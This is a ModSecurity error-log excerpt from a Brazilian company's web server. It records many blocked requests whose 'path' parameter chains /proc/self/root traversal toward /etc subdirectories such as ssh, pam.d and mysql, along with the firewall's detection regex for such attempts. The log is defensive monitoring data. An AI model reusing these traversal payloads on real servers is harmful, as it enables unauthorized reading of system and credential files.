[hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5HARES9pL8P-grjlgAwAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:01.703642 2026] [:error] [pid 5398:tid 140411641214720] [client 74.7.241.46:33348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5HQRES9pL8P-grjlgBAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:03.183357 2026] [:error] [pid 7000:tid 140411666392832] [client 74.7.241.46:33350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5HxePVOt35XCGZP8lpAAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:04.635157 2026] [:error] [pid 662:tid 140411616036608] [client 74.7.241.46:33360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5IK60egQjobaJUYgHjQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:06.147362 2026] [:error] [pid 2305:tid 140411557287680] [client 74.7.241.46:33362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5IgQohV2v-7oj5HHykQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:07.666535 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.241.46:33366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5I1KJy4A1bGlmj9BNkwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:08.814621 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.243.203:55048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5JO82sZHvlq4xgHq7SQAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Tue Mar 17 08:21:10.294123 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.241.46:43186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5JlKJy4A1bGlmj9BNlQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:17.319825 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.241.46:43196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5KwQohV2v-7oj5HHymgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:19.952708 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:55912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5L5qmL8PQht4WJFlApgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:21.407401 2026] [:error] [pid 7000:tid 140411548894976] [client 74.7.241.46:55918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5MRePVOt35XCGZP8lpwAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:23.856503 2026] [:error] [pid 7000:tid 140411683178240] [client 74.7.241.46:55932] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5MhePVOt35XCGZP8lqAAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:29.457782 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:55946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5Oe82sZHvlq4xgHq7UAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:30.959502 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.46:49242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5OtCmCSWTlPouqorDcAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:33.599129 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.241.46:49258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5PXRXaaWotPICgYscOQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:36.984937 2026] [:error] [pid 7000:tid 140411574073088] [client 74.7.241.46:49270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5QBePVOt35XCGZP8lsQAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:38.312753 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.241.46:34330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5QpqmL8PQht4WJFlAqgAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:39.568508 2026] [:error] [pid 6002:tid 140411725141760] [client 74.7.241.46:34340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5Q_AKZeKGvQeoFhlC_gAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:40.879291 2026] [:error] [pid 11469:tid 140411674785536] [client 74.7.241.46:34354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5RJDEJR9VXonE_-1FTAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:42.235718 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:34368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5RpqmL8PQht4WJFlAqwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:44.568802 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.46:34382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5SAeiSKl8TjouI-b6ewAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:45.866576 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.241.46:34386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5SXRXaaWotPICgYscPgAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
